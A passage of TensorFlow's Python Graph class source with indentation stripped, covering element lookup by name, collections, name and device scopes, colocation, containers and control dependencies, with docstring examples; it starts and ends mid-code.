new_control_inputs = self._control_dependencies_for_inputs(op.inputs)
op._add_control_inputs(new_control_inputs)
op._control_flow_post_processing()
# pylint: enable=protected-access
return new_ops
def as_graph_element(self, obj, allow_tensor=True, allow_operation=True):
"""Returns the object referred to by `obj`, as an `Operation` or `Tensor`.
This function validates that `obj` represents an element of this
graph, and gives an informative error message if it is not.
This function is the canonical way to get/validate an object of
one of the allowed types from an external argument reference in the
Session API.
This method may be called concurrently from multiple threads.
Args:
obj: A `Tensor`, an `Operation`, or the name of a tensor or operation. Can
also be any object with an `_as_graph_element()` method that returns a
value of one of these types. Note: `_as_graph_element` will be called
inside the graph's lock and so may not modify the graph.
allow_tensor: If true, `obj` may refer to a `Tensor`.
allow_operation: If true, `obj` may refer to an `Operation`.
Returns:
The `Tensor` or `Operation` in the Graph corresponding to `obj`.
Raises:
TypeError: If `obj` is not a type we support attempting to convert
to types.
ValueError: If `obj` is of an appropriate type but invalid. For
example, an invalid string.
KeyError: If `obj` is not an object in the graph.
"""
if self._finalized:
return self._as_graph_element_locked(obj, allow_tensor, allow_operation)
with self._lock:
return self._as_graph_element_locked(obj, allow_tensor, allow_operation)
def _as_graph_element_locked(self, obj, allow_tensor, allow_operation):
"""See `Graph.as_graph_element()` for details."""
# The vast majority of this function is figuring
# out what an API user might be doing wrong, so
# that we can give helpful error messages.
#
# Ideally, it would be nice to split it up, but we
# need context to generate nice error messages.
if allow_tensor and allow_operation:
types_str = "Tensor or Operation"
elif allow_tensor:
types_str = "Tensor"
elif allow_operation:
types_str = "Operation"
else:
raise ValueError("allow_tensor and allow_operation can't both be False.")
temp_obj = _as_graph_element(obj)
if temp_obj is not None:
obj = temp_obj
# If obj appears to be a name...
if isinstance(obj, compat.bytes_or_text_types):
name = compat.as_str(obj)
if ":" in name and allow_tensor:
# Looks like a Tensor name and can be a Tensor.
try:
op_name, out_n = name.split(":")
out_n = int(out_n)
except:
raise ValueError("The name %s looks a like a Tensor name, but is "
"not a valid one. Tensor names must be of the "
"form \"<op_name>:<output_index>\"." % repr(name))
if op_name in self._nodes_by_name:
op = self._nodes_by_name[op_name]
else:
raise KeyError("The name %s refers to a Tensor which does not "
"exist. The operation, %s, does not exist in the "
"graph." % (repr(name), repr(op_name)))
try:
return op.outputs[out_n]
except:
raise KeyError("The name %s refers to a Tensor which does not "
"exist. The operation, %s, exists but only has "
"%s outputs." %
(repr(name), repr(op_name), len(op.outputs)))
elif ":" in name and not allow_tensor:
# Looks like a Tensor name but can't be a Tensor.
raise ValueError("Name %s appears to refer to a Tensor, not a %s." %
(repr(name), types_str))
elif ":" not in name and allow_operation:
# Looks like an Operation name and can be an Operation.
if name not in self._nodes_by_name:
raise KeyError("The name %s refers to an Operation not in the "
"graph." % repr(name))
return self._nodes_by_name[name]
elif ":" not in name and not allow_operation:
# Looks like an Operation name but can't be an Operation.
if name in self._nodes_by_name:
# Yep, it's an Operation name
err_msg = ("The name %s refers to an Operation, not a %s." %
(repr(name), types_str))
else:
err_msg = ("The name %s looks like an (invalid) Operation name, "
"not a %s." % (repr(name), types_str))
err_msg += (" Tensor names must be of the form "
"\"<op_name>:<output_index>\".")
raise ValueError(err_msg)
elif isinstance(obj, Tensor) and allow_tensor:
# Actually obj is just the object it's referring to.
if obj.graph is not self:
raise ValueError("Tensor %s is not an element of this graph." % obj)
return obj
elif isinstance(obj, Operation) and allow_operation:
# Actually obj is just the object it's referring to.
if obj.graph is not self:
raise ValueError("Operation %s is not an element of this graph." % obj)
return obj
else:
# We give up!
raise TypeError("Can not convert a %s into a %s." %
(type(obj).__name__, types_str))
def get_operations(self):
"""Return the list of operations in the graph.
You can modify the operations in place, but modifications
to the list such as inserts/delete have no effect on the
list of operations known to the graph.
This method may be called concurrently from multiple threads.
Returns:
A list of Operations.
"""
if self._finalized:
return list(self._nodes_by_id.values())
with self._lock:
return list(self._nodes_by_id.values())
def get_operation_by_name(self, name):
"""Returns the `Operation` with the given `name`.
This method may be called concurrently from multiple threads.
Args:
name: The name of the `Operation` to return.
Returns:
The `Operation` with the given `name`.
Raises:
TypeError: If `name` is not a string.
KeyError: If `name` does not correspond to an operation in this graph.
"""
if not isinstance(name, six.string_types):
raise TypeError("Operation names are strings (or similar), not %s." %
type(name).__name__)
return self.as_graph_element(name, allow_tensor=False, allow_operation=True)
def _get_operation_by_name_unsafe(self, name):
"""Returns the `Operation` with the given `name`.
This is a internal unsafe version of get_operation_by_name. It skips many
checks and does not have user friedly error messages but runs considerably
faster. This method may be called concurrently from multiple threads.
Args:
name: The name of the `Operation` to return.
Returns:
The `Operation` with the given `name`.
Raises:
KeyError: If `name` does not correspond to an operation in this graph.
"""
if self._finalized:
return self._nodes_by_name[name]
with self._lock:
return self._nodes_by_name[name]
def _get_operation_by_tf_operation(self, tf_oper):
op_name = c_api.TF_OperationName(tf_oper)
return self._get_operation_by_name_unsafe(op_name)
def get_tensor_by_name(self, name):
"""Returns the `Tensor` with the given `name`.
This method may be called concurrently from multiple threads.
Args:
name: The name of the `Tensor` to return.
Returns:
The `Tensor` with the given `name`.
Raises:
TypeError: If `name` is not a string.
KeyError: If `name` does not correspond to a tensor in this graph.
"""
# Names should be strings.
if not isinstance(name, six.string_types):
raise TypeError("Tensor names are strings (or similar), not %s." %
type(name).__name__)
return self.as_graph_element(name, allow_tensor=True, allow_operation=False)
def _get_tensor_by_tf_output(self, tf_output):
"""Returns the `Tensor` representing `tf_output`.
Note that there is only one such `Tensor`, i.e. multiple calls to this
function with the same TF_Output value will always return the same `Tensor`
object.
Args:
tf_output: A wrapped `TF_Output` (the C API equivalent of `Tensor`).
Returns:
The `Tensor` that represents `tf_output`.
"""
op = self._get_operation_by_tf_operation(tf_output.oper)
return op.outputs[tf_output.index]
def _next_id(self):
"""Id for next Operation instance. Also increments the internal id."""
self._check_not_finalized()
with self._lock:
self._next_id_counter += 1
return self._next_id_counter
@property
def _last_id(self):
return self._next_id_counter
def _get_op_def(self, type): # pylint: disable=redefined-builtin
"""Returns the `OpDef` proto for `type`. `type` is a string."""
# NOTE: No locking is required because the lookup and insertion operations
# on Python dictionaries are atomic.
try:
return self._op_def_cache[type]
except KeyError:
with c_api_util.tf_buffer() as buf:
# pylint: disable=protected-access
c_api.TF_GraphGetOpDef(self._c_graph, compat.as_bytes(type), buf)
# pylint: enable=protected-access
data = c_api.TF_GetBuffer(buf)
op_def = op_def_pb2.OpDef()
op_def.ParseFromString(compat.as_bytes(data))
self._op_def_cache[type] = op_def
return op_def
def as_default(self):
"""Returns a context manager that makes this `Graph` the default graph.
This method should be used if you want to create multiple graphs
in the same process. For convenience, a global default graph is
provided, and all ops will be added to this graph if you do not
create a new graph explicitly.
Use this method with the `with` keyword to specify that ops created within
the scope of a block should be added to this graph. In this case, once
the scope of the `with` is exited, the previous default graph is set again
as default. There is a stack, so it's ok to have multiple nested levels
of `as_default` calls.
The default graph is a property of the current thread. If you
create a new thread, and wish to use the default graph in that
thread, you must explicitly add a `with g.as_default():` in that
thread's function.
The following code examples are equivalent:
```python
# 1. Using Graph.as_default():
g = tf.Graph()
with g.as_default():
c = tf.constant(5.0)
assert c.graph is g
# 2. Constructing and making default:
with tf.Graph().as_default() as g:
c = tf.constant(5.0)
assert c.graph is g
```
If eager execution is enabled ops created under this context manager will be
added to the graph instead of executed eagerly.
Returns:
A context manager for using this graph as the default graph.
"""
return _default_graph_stack.get_controller(self)
@property
def collections(self):
"""Returns the names of the collections known to this graph."""
return list(self._collections)
def add_to_collection(self, name, value):
"""Stores `value` in the collection with the given `name`.
Note that collections are not sets, so it is possible to add a value to
a collection several times.
Args:
name: The key for the collection. The `GraphKeys` class contains many
standard names for collections.
value: The value to add to the collection.
""" # pylint: disable=g-doc-exception
self._check_not_finalized()
with self._lock:
if name not in self._collections:
self._collections[name] = [value]
else:
self._collections[name].append(value)
def add_to_collections(self, names, value):
"""Stores `value` in the collections given by `names`.
Note that collections are not sets, so it is possible to add a value to
a collection several times. This function makes sure that duplicates in
`names` are ignored, but it will not check for pre-existing membership of
`value` in any of the collections in `names`.
`names` can be any iterable, but if `names` is a string, it is treated as a
single collection name.
Args:
names: The keys for the collections to add to. The `GraphKeys` class
contains many standard names for collections.
value: The value to add to the collections.
"""
# Make sure names are unique, but treat strings as a single collection name
names = (names,) if isinstance(names, six.string_types) else set(names)
for name in names:
self.add_to_collection(name, value)
def get_collection_ref(self, name):
"""Returns a list of values in the collection with the given `name`.
If the collection exists, this returns the list itself, which can
be modified in place to change the collection. If the collection does
not exist, it is created as an empty list and the list is returned.
This is different from `get_collection()` which always returns a copy of
the collection list if it exists and never creates an empty collection.
Args:
name: The key for the collection. For example, the `GraphKeys` class
contains many standard names for collections.
Returns:
The list of values in the collection with the given `name`, or an empty
list if no value has been added to that collection.
""" # pylint: disable=g-doc-exception
with self._lock:
coll_list = self._collections.get(name, None)
if coll_list is None:
coll_list = []
self._collections[name] = coll_list
return coll_list
def get_collection(self, name, scope=None):
"""Returns a list of values in the collection with the given `name`.
This is different from `get_collection_ref()` which always returns the
actual collection list if it exists in that it returns a new list each time
it is called.
Args:
name: The key for the collection. For example, the `GraphKeys` class
contains many standard names for collections.
scope: (Optional.) A string. If supplied, the resulting list is filtered
to include only items whose `name` attribute matches `scope` using
`re.match`. Items without a `name` attribute are never returned if a
scope is supplied. The choice of `re.match` means that a `scope` without
special tokens filters by prefix.
Returns:
The list of values in the collection with the given `name`, or
an empty list if no value has been added to that collection. The
list contains the values in the order under which they were
collected.
""" # pylint: disable=g-doc-exception
with self._lock:
collection = self._collections.get(name, None)
if collection is None:
return []
if scope is None:
return list(collection)
else:
c = []
regex = re.compile(scope)
for item in collection:
try:
if regex.match(item.name):
c.append(item)
except AttributeError:
# Collection items with no name are ignored.
pass
return c
def get_all_collection_keys(self):
"""Returns a list of collections used in this graph."""
with self._lock:
return [x for x in self._collections if isinstance(x, six.string_types)]
def clear_collection(self, name):
"""Clears all values in a collection.
Args:
name: The key for the collection. The `GraphKeys` class contains many
standard names for collections.
"""
self._check_not_finalized()
with self._lock:
if name in self._collections:
del self._collections[name]
@tf_contextlib.contextmanager
def _original_op(self, op):
"""Python 'with' handler to help annotate ops with their originator.
An op may have an 'original_op' property that indicates the op on which
it was based. For example a replica op is based on the op that was
replicated and a gradient op is based on the op that was differentiated.
All ops created in the scope of this 'with' handler will have
the given 'op' as their original op.
Args:
op: The Operation that all ops created in this scope will have as their
original op.
Yields:
Nothing.
"""
old_original_op = self._default_original_op
self._default_original_op = op
try:
yield
finally:
self._default_original_op = old_original_op
@property
def _name_stack(self):
# This may be called from a thread where name_stack doesn't yet exist.
if not hasattr(self._thread_local, "_name_stack"):
self._thread_local._name_stack = ""
return self._thread_local._name_stack
@_name_stack.setter
def _name_stack(self, name_stack):
self._thread_local._name_stack = name_stack
# pylint: disable=g-doc-return-or-yield,line-too-long
@tf_contextlib.contextmanager
def name_scope(self, name):
"""Returns a context manager that creates hierarchical names for operations.
A graph maintains a stack of name scopes. A `with name_scope(...):`
statement pushes a new name onto the stack for the lifetime of the context.
The `name` argument will be interpreted as follows:
* A string (not ending with '/') will create a new name scope, in which
`name` is appended to the prefix of all operations created in the
context. If `name` has been used before, it will be made unique by
calling `self.unique_name(name)`.
* A scope previously captured from a `with g.name_scope(...) as
scope:` statement will be treated as an "absolute" name scope, which
makes it possible to re-enter existing scopes.
* A value of `None` or the empty string will reset the current name scope
to the top-level (empty) name scope.
For example:
```python
with tf.Graph().as_default() as g:
c = tf.constant(5.0, name="c")
assert c.op.name == "c"
c_1 = tf.constant(6.0, name="c")
assert c_1.op.name == "c_1"
# Creates a scope called "nested"
with g.name_scope("nested") as scope:
nested_c = tf.constant(10.0, name="c")
assert nested_c.op.name == "nested/c"
# Creates a nested scope called "inner".
with g.name_scope("inner"):
nested_inner_c = tf.constant(20.0, name="c")
assert nested_inner_c.op.name == "nested/inner/c"
# Create a nested scope called "inner_1".
with g.name_scope("inner"):
nested_inner_1_c = tf.constant(30.0, name="c")
assert nested_inner_1_c.op.name == "nested/inner_1/c"
# Treats `scope` as an absolute name scope, and
# switches to the "nested/" scope.
with g.name_scope(scope):
nested_d = tf.constant(40.0, name="d")
assert nested_d.op.name == "nested/d"
with g.name_scope(""):
e = tf.constant(50.0, name="e")
assert e.op.name == "e"
```
The name of the scope itself can be captured by `with
g.name_scope(...) as scope:`, which stores the name of the scope
in the variable `scope`. This value can be used to name an
operation that represents the overall result of executing the ops
in a scope. For example:
```python
inputs = tf.constant(...)
with g.name_scope('my_layer') as scope:
weights = tf.Variable(..., name="weights")
biases = tf.Variable(..., name="biases")
affine = tf.matmul(inputs, weights) + biases
output = tf.nn.relu(affine, name=scope)
```
NOTE: This constructor validates the given `name`. Valid scope
names match one of the following regular expressions:
[A-Za-z0-9.][A-Za-z0-9_.\\-/]* (for scopes at the root)
[A-Za-z0-9_.\\-/]* (for other scopes)
Args:
name: A name for the scope.
Returns:
A context manager that installs `name` as a new name scope.
Raises:
ValueError: If `name` is not a valid scope name, according to the rules
above.
"""
if name:
if isinstance(name, compat.bytes_or_text_types):
name = compat.as_str(name)
if self._name_stack:
# Scopes created in a nested scope may have initial characters
# that are illegal as the initial character of an op name
# (viz. '-', '\', '/', and '_').
if not _VALID_SCOPE_NAME_REGEX.match(name):
raise ValueError("'%s' is not a valid scope name" % name)
else:
# Scopes created in the root must match the more restrictive
# op name regex, which constrains the initial character.
if not _VALID_OP_NAME_REGEX.match(name):
raise ValueError("'%s' is not a valid scope name" % name)
old_stack = self._name_stack
if not name: # Both for name=None and name="" we re-set to empty scope.
new_stack = None
elif name[-1] == "/":
new_stack = name_from_scope_name(name)
else:
new_stack = self.unique_name(name)
self._name_stack = new_stack
try:
yield "" if new_stack is None else new_stack + "/"
finally:
self._name_stack = old_stack
# pylint: enable=g-doc-return-or-yield,line-too-long
def unique_name(self, name, mark_as_used=True):
"""Return a unique operation name for `name`.
Note: You rarely need to call `unique_name()` directly. Most of
the time you just need to create `with g.name_scope()` blocks to
generate structured names.
`unique_name` is used to generate structured names, separated by
`"/"`, to help identify operations when debugging a graph.
Operation names are displayed in error messages reported by the
TensorFlow runtime, and in various visualization tools such as
TensorBoard.
If `mark_as_used` is set to `True`, which is the default, a new
unique name is created and marked as in use. If it's set to `False`,
the unique name is returned without actually being marked as used.
This is useful when the caller simply wants to know what the name
to be created will be.
Args:
name: The name for an operation.
mark_as_used: Whether to mark this name as being used.
Returns:
A string to be passed to `create_op()` that will be used
to name the operation being created.
"""
if self._name_stack:
name = self._name_stack + "/" + name
# For the sake of checking for names in use, we treat names as case
# insensitive (e.g. foo = Foo).
name_key = name.lower()
i = self._names_in_use.get(name_key, 0)
# Increment the number for "name_key".
if mark_as_used:
self._names_in_use[name_key] = i + 1
if i > 0:
base_name_key = name_key
# Make sure the composed name key is not already used.
while name_key in self._names_in_use:
name_key = "%s_%d" % (base_name_key, i)
i += 1
# Mark the composed name_key as used in case someone wants
# to call unique_name("name_1").
if mark_as_used:
self._names_in_use[name_key] = 1
# Return the new name with the original capitalization of the given name.
name = "%s_%d" % (name, i - 1)
return name
def get_name_scope(self):
"""Returns the current name scope.
For example:
```python
with tf.name_scope('scope1'):
with tf.name_scope('scope2'):
print(tf.compat.v1.get_default_graph().get_name_scope())
```
would print the string `scope1/scope2`.
Returns:
A string representing the current name scope.
"""
return self._name_stack
@tf_contextlib.contextmanager
def _colocate_with_for_gradient(self, op, gradient_uid,
ignore_existing=False):
with self.colocate_with(op, ignore_existing):
if gradient_uid is not None and self._control_flow_context is not None:
self._control_flow_context.EnterGradientColocation(op, gradient_uid)
try:
yield
finally:
self._control_flow_context.ExitGradientColocation(op, gradient_uid)
else:
yield
@tf_contextlib.contextmanager
def colocate_with(self, op, ignore_existing=False):
"""Returns a context manager that specifies an op to colocate with.
Note: this function is not for public use, only for internal libraries.
For example:
```python
a = tf.Variable([1.0])
with g.colocate_with(a):
b = tf.constant(1.0)
c = tf.add(a, b)
```
`b` and `c` will always be colocated with `a`, no matter where `a`
is eventually placed.
**NOTE** Using a colocation scope resets any existing device constraints.
If `op` is `None` then `ignore_existing` must be `True` and the new
scope resets all colocation and device constraints.
Args:
op: The op to colocate all created ops with, or `None`.
ignore_existing: If true, only applies colocation of this op within the
context, rather than applying all colocation properties on the stack.
If `op` is `None`, this value must be `True`.
Raises:
ValueError: if op is None but ignore_existing is False.
Yields:
A context manager that specifies the op with which to colocate
newly created ops.
"""
if op is None and not ignore_existing:
raise ValueError("Trying to reset colocation (op is None) but "
"ignore_existing is not True")
op = _op_to_colocate_with(op, self)
# By default, colocate_with resets the device function stack,
# since colocate_with is typically used in specific internal
# library functions where colocation is intended to be "stronger"
# than device functions.
#
# In the future, a caller may specify that device_functions win
# over colocation, in which case we can add support.
device_fn_tmp = self._device_function_stack
self._device_function_stack = traceable_stack.TraceableStack()
if ignore_existing:
current_stack = self._colocation_stack
self._colocation_stack = traceable_stack.TraceableStack()
if op is not None:
# offset refers to the stack frame used for storing code location.
# We use 4, the sum of 1 to use our caller's stack frame and 3
# to jump over layers of context managers above us.
self._colocation_stack.push_obj(op, offset=4)
try:
yield
finally:
# Restore device function stack
self._device_function_stack = device_fn_tmp
if op is not None:
self._colocation_stack.pop_obj()
# Reset the colocation stack if requested.
if ignore_existing:
self._colocation_stack = current_stack
def _add_device_to_stack(self, device_name_or_function, offset=0):
"""Add device to stack manually, separate from a context manager."""
total_offset = 1 + offset
spec = _UserDeviceSpec(device_name_or_function)
self._device_function_stack.push_obj(spec, offset=total_offset)
return spec
@tf_contextlib.contextmanager
def device(self, device_name_or_function):
# pylint: disable=line-too-long
"""Returns a context manager that specifies the default device to use.
The `device_name_or_function` argument may either be a device name
string, a device function, or None:
* If it is a device name string, all operations constructed in
this context will be assigned to the device with that name, unless
overridden by a nested `device()` context.
* If it is a function, it will be treated as a function from
Operation objects to device name strings, and invoked each time
a new Operation is created. The Operation will be assigned to
the device with the returned name.
* If it is None, all `device()` invocations from the enclosing context
will be ignored.
For information about the valid syntax of device name strings, see
the documentation in
[`DeviceNameUtils`](https://www.tensorflow.org/code/tensorflow/core/util/device_name_utils.h).
For example:
```python
with g.device('/device:GPU:0'):
# All operations constructed in this context will be placed
# on GPU 0.
with g.device(None):
# All operations constructed in this context will have no
# assigned device.
# Defines a function from `Operation` to device string.
def matmul_on_gpu(n):
if n.type == "MatMul":
return "/device:GPU:0"
else:
return "/cpu:0"
with g.device(matmul_on_gpu):
# All operations of type "MatMul" constructed in this context
# will be placed on GPU 0; all other operations will be placed
# on CPU 0.
```
**N.B.** The device scope may be overridden by op wrappers or
other library code. For example, a variable assignment op
`v.assign()` must be colocated with the `tf.Variable` `v`, and
incompatible device scopes will be ignored.
Args:
device_name_or_function: The device name or function to use in the
context.
Yields:
A context manager that specifies the default device to use for newly
created ops.
Raises:
RuntimeError: If device scopes are not properly nested.
"""
self._add_device_to_stack(device_name_or_function, offset=2)
old_top_of_stack = self._device_function_stack.peek_top_obj()
try:
yield
finally:
new_top_of_stack = self._device_function_stack.peek_top_obj()
if old_top_of_stack is not new_top_of_stack:
raise RuntimeError("Exiting device scope without proper scope nesting.")
self._device_function_stack.pop_obj()
def _apply_device_functions(self, op):
"""Applies the current device function stack to the given operation."""
# Apply any device functions in LIFO order, so that the most recently
# pushed function has the first chance to apply a device to the op.
# We apply here because the result can depend on the Operation's
# signature, which is computed in the Operation constructor.
# pylint: disable=protected-access
prior_device_string = None
for device_spec in self._device_function_stack.peek_objs():
if device_spec.is_null_merge:
continue
if device_spec.function is None:
break
device_string = device_spec.string_merge(op)
# Take advantage of the fact that None is a singleton and Python interns
# strings, since identity checks are faster than equality checks.
if device_string is not prior_device_string:
op._set_device_from_string(device_string)
prior_device_string = device_string
op._device_code_locations = self._snapshot_device_function_stack_metadata()
# pylint: enable=protected-access
# pylint: disable=g-doc-return-or-yield
@tf_contextlib.contextmanager
def container(self, container_name):
"""Returns a context manager that specifies the resource container to use.
Stateful operations, such as variables and queues, can maintain their
states on devices so that they can be shared by multiple processes.
A resource container is a string name under which these stateful
operations are tracked. These resources can be released or cleared
with `tf.Session.reset()`.
For example:
```python
with g.container('experiment0'):
# All stateful Operations constructed in this context will be placed
# in resource container "experiment0".
v1 = tf.Variable([1.0])
v2 = tf.Variable([2.0])
with g.container("experiment1"):
# All stateful Operations constructed in this context will be
# placed in resource container "experiment1".
v3 = tf.Variable([3.0])
q1 = tf.queue.FIFOQueue(10, tf.float32)
# All stateful Operations constructed in this context will be
# be created in the "experiment0".
v4 = tf.Variable([4.0])
q1 = tf.queue.FIFOQueue(20, tf.float32)
with g.container(""):
# All stateful Operations constructed in this context will be
# be placed in the default resource container.
v5 = tf.Variable([5.0])
q3 = tf.queue.FIFOQueue(30, tf.float32)
# Resets container "experiment0", after which the state of v1, v2, v4, q1
# will become undefined (such as uninitialized).
tf.Session.reset(target, ["experiment0"])
```
Args:
container_name: container name string.
Returns:
A context manager for defining resource containers for stateful ops,
yields the container name.
"""
original_container = self._container
self._container = container_name
try:
yield self._container
finally:
self._container = original_container
# pylint: enable=g-doc-return-or-yield
class _ControlDependenciesController(object):
"""Context manager for `control_dependencies()`."""
def __init__(self, graph, control_inputs):
"""Create a new `_ControlDependenciesController`.
A `_ControlDependenciesController` is the context manager for
`with tf.control_dependencies()` blocks. These normally nest,
as described in the documentation for `control_dependencies()`.
The `control_inputs` argument list control dependencies that must be
added to the current set of control dependencies. Because of
uniquification the set can be empty even if the caller passed a list of
ops. The special value `None` indicates that we want to start a new
empty set of control dependencies instead of extending the current set.
In that case we also clear the current control flow context, which is an
additional mechanism to add control dependencies.
Args:
graph: The graph that this controller is managing.
control_inputs: List of ops to use as control inputs in addition to the
current control dependencies. None to indicate that the dependencies
should be cleared.
"""
self._graph = graph
if control_inputs is None:
self._control_inputs_val = []
self._new_stack = True
else:
self._control_inputs_val = control_inputs
self._new_stack = False
self._seen_nodes = set()
self._old_stack = None
self._old_control_flow_context = None
# pylint: disable=protected-access
def __enter__(self):
if self._new_stack:
# Clear the control_dependencies graph.
self._old_stack = self._graph._control_dependencies_stack
self._graph._control_dependencies_stack = []
# Clear the control_flow_context too.
self._old_control_flow_context = self._graph._get_control_flow_context()
self._graph._set_control_flow_context(None)
self._graph._push_control_dependencies_controller(self)
def __exit__(self, unused_type, unused_value, unused_traceback):
self._graph._pop_control_dependencies_controller(self)
if self._new_stack:
self._graph._control_dependencies_stack = self._old_stack
self._graph._set_control_flow_context(self._old_control_flow_context)
# pylint: enable=protected-access
@property
def control_inputs(self):
return self._control_inputs_val
def add_op(self, op):
if isinstance(op, Tensor):
op = op.experimental_ref()
self._seen_nodes.add(op)
def op_in_group(self, op):
if isinstance(op, Tensor):
op = op.experimental_ref()
return op in self._seen_nodes
def _push_control_dependencies_controller(self, controller):
self._control_dependencies_stack.append(controller)
def _pop_control_dependencies_controller(self, controller):
assert self._control_dependencies_stack[-1] is controller
self._control_dependencies_stack.pop()
def _current_control_dependencies(self):
ret = set()
for controller in self._control_dependencies_stack:
for op in controller.control_inputs:
ret.add(op)
return ret
def _control_dependencies_for_inputs(self, input_ops):
"""For an op that takes `input_ops` as inputs, compute control inputs.
The returned control dependencies should yield an execution that
is equivalent to adding all control inputs in
self._control_dependencies_stack to a newly created op. However,
this function attempts to prune the returned control dependencies
by observing that nodes created within the same `with
control_dependencies(...):` block may have data dependencies that make
the explicit approach redundant.
Args:
input_ops: The data input ops for an op to be created.
Returns:
A list of control inputs for the op to be created.
"""
ret = []
for controller in self._control_dependencies_stack:
# If any of the input_ops already depends on the inputs from controller,
# we say that the new op is dominated (by that input), and we therefore
# do not need to add control dependencies for this controller's inputs.
dominated = False
for op in input_ops:
if controller.op_in_group(op):
dominated = True
break
if not dominated:
# Don't add a control input if we already have a data dependency on i.
# NOTE(mrry): We do not currently track transitive data dependencies,
# so we may add redundant control inputs.
ret.extend([c for c in controller.control_inputs if c not in input_ops])
return ret
def _record_op_seen_by_control_dependencies(self, op):
"""Record that the given op depends on all registered control dependencies.
Args:
op: An Operation.
"""
for controller in self._control_dependencies_stack:
controller.add_op(op)
def control_dependencies(self, control_inputs):
"""Returns a context manager that specifies control dependencies.
Use with the `with` keyword to specify that all operations constructed
within the context should have control dependencies on
`control_inputs`. For example:
```python
with g.control_dependencies([a, b, c]):
# `d` and `e` will only run after `a`, `b`, and `c` have executed.
d = ...
e = ...
```
Multiple calls to `control_dependencies()` can be nested, and in
that case a new `Operation` will have control dependencies on the union
of `control_inputs` from all active contexts.
```python
with g.control_dependencies([a, b]):
# Ops constructed here run after `a` and `b`.
with g.control_dependencies([c, d]):
# Ops constructed here run after `a`, `b`, `c`, and `d`.
```
You can pass None to clear the control dependencies:
```python
with g.control_dependencies([a, b]):
# Ops constructed here run after `a` and `b`.
with g.control_dependencies(None):
# Ops constructed here run normally, not waiting for either `a` or `b`.
with g.control_dependencies([c, d]):
# Ops constructed here run after `c` and `d`, also not waiting
# for either `a` or `b`.
```
*N.B.* The control dependencies context applies *only* to ops that
are constructed within the context. Merely using an op or tensor
in the context does not add a control dependency. The following
example illustrates this point:
```python
# WRONG
def my_func(pred, tensor):
t = tf.matmul(tensor, tensor)
with tf.control_dependencies([pred]):
# The matmul op is created outside the context, so no control
# dependency will be added.
return t
# RIGHT
def my_func(pred, tensor):
with tf.control_dependencies([pred]):
# The matmul op is created in the context, so a control dependency
# will be added.
return tf.matmul(tensor, tensor)
```
Also note that though execution of ops created under this scope will trigger
execution of the dependencies, the ops created under this scope might still
be pruned from a normal tensorflow graph. For example, in the following
snippet of code the dependencies are never executed:
```python
loss = model.loss()
with tf.control_dependencies(dependencies):
loss = loss + tf.constant(1) # note: dependencies ignored in the
# backward pass
return tf.gradients(loss, model.variables)
```
This is because evaluating the gradient graph does not require evaluating
the constant(1) op created in the forward pass.
Args:
control_inputs: A list of `Operation` or `Tensor` objects which must be
executed or computed before running the operations defined in the
context. Can also be `None` to clear the control dependencies.
Returns:
A context manager that specifies control dependencies for all
operations constructed within the context.
Raises:
TypeError: If `control_inputs` is not a list of `Operation` or
`Tensor` objects.
"""
if control_inputs is None:
return self._ControlDependenciesController(self, None)
# First convert the inputs to ops, and deduplicate them.
# NOTE(mrry): Other than deduplication, we do not currently track direct
# or indirect dependencies between control_inputs, which may result in
# redundant control inputs.
control_ops = []
current = self._current_control_dependencies()
for c in control_inputs:
# The hasattr(handle) is designed to match ResourceVariables. This is so
# control dependencies on a variable or on an unread variable don't
# trigger reads.
if (isinstance(c, IndexedSlices) or
(hasattr(c, "_handle") and hasattr(c, "op"))):
c = c.op
c = self.as_graph_element(c)
if isinstance(c, Tensor):
c = c.op
elif not isinstance(c, Operation):
raise TypeError("Control input must be Operation or Tensor: %s" % c)
if c not in current:
control_ops.append(c)
current.add(c)
return self._ControlDependenciesController(self, control_ops)
# pylint: disable=g-doc-return-or-yield
@tf_contextlib.contextmanager
def _attr_scope(self, attr_map):
"""EXPERIMENTAL: A context manager for setting attributes on operators.
This context manager can be used to add additional
attributes to operators within the scope of the context.
For example:
with ops.Graph().as_default() as g:
f_1 = Foo() # No extra attributes
with g._attr_scope({"_a": tf.attr_value_pb2.AttrValue(b=False)}):
f_2 = Foo() # Additional attribute _a=False
with g._attr_scope({"_a": tf.attr_value_pb2.AttrValue(b=True)}):
f_3 = Foo() # Additional attribute _a=False
with g._attr_scope({"_a": None}):
f_4 = Foo() # No additional attributes.
Args:
attr_map: A dictionary mapping attr name strings to AttrValue protocol
buffers or None.
Returns:
A context manager that sets the kernel label to be used for one or more
ops created in that context.
Raises:
TypeError: If attr_map is not a dictionary mapping
strings to AttrValue protobufs.
"""
if not isinstance(attr_map, dict):
raise TypeError("attr_map must be a dictionary mapping "
"strings to AttrValue protocol buffers")
# The saved_attrs dictionary stores any currently-set labels that
# will be overridden by this context manager.
saved_attrs = {}
# Install the given attribute
for name, attr in attr_map.items():
if not (isinstance(name, six.string_types) and
(isinstance(attr, (type(None), attr_value_pb2.AttrValue)) or
callable(attr))):
raise TypeError("attr_map must be a dictionary mapping "
"strings to AttrValue protocol buffers or "
"callables that emit AttrValue protocol buffers")
try:
saved_attrs[name] = self._attr_scope_map[name]
except KeyError:
pass
if attr is None:
del self._attr_scope_map[name]
else:
self._attr_scope_map[name] = attr
try:
yield # The code within the context runs here.
finally:
# Remove the attributes set for this context, and restore any saved
# attributes.
for name, attr in attr_map.items():
try:
self._attr_scope_map[name] = saved_attrs[name]
except KeyError:
del self._attr_scope_map[name]
# pylint: enable=g-doc-return-or-yield
# pylint: disable=g-doc-return-or-yield
@tf_contextlib.contextmanager
def _kernel_label_map(self, op_to_kernel_label_map):
"""EXPERIMENTAL: A context manager for setting kernel labels.
This context manager can be used to select particular
implementations of kernels within the scope of the context.
For example:
with ops.Graph().as_default() as g:
f_1 = Foo() # Uses the default registered kernel for the Foo op.
with g.kernel_label_map({"Foo": "v_2"}):
f_2 = Foo() # Uses the registered kernel with label "v_2"
# for the Foo op.
with g.kernel_label_map({"Foo": "v_3"}):
f_3 = Foo() # Uses the registered kernel with label "v_3"
# for the Foo op.
with g.kernel_label_map({"Foo": ""}):
f_4 = Foo() # Uses the default registered kernel
# for the Foo op.
Args:
op_to_kernel_label_map: A dictionary mapping op type strings to kernel
label strings.
Returns:
A context manager that sets the kernel label to be used for one or more
ops created in that context.
Raises:
TypeError: If op_to_kernel_label_map is not a dictionary mapping
strings to strings.
"""
if not isinstance(op_to_kernel_label_map, dict):
raise TypeError("op_to_kernel_label_map must be a dictionary mapping "
"strings to strings")
# The saved_labels dictionary stores any currently-set labels that
# will be overridden by this context manager.
saved_labels = {}
# Install the given label
for op_type, label in op_to_kernel_label_map.items():
if not (isinstance(op_type, six.string_types) and
isinstance(label, six.string_types)):
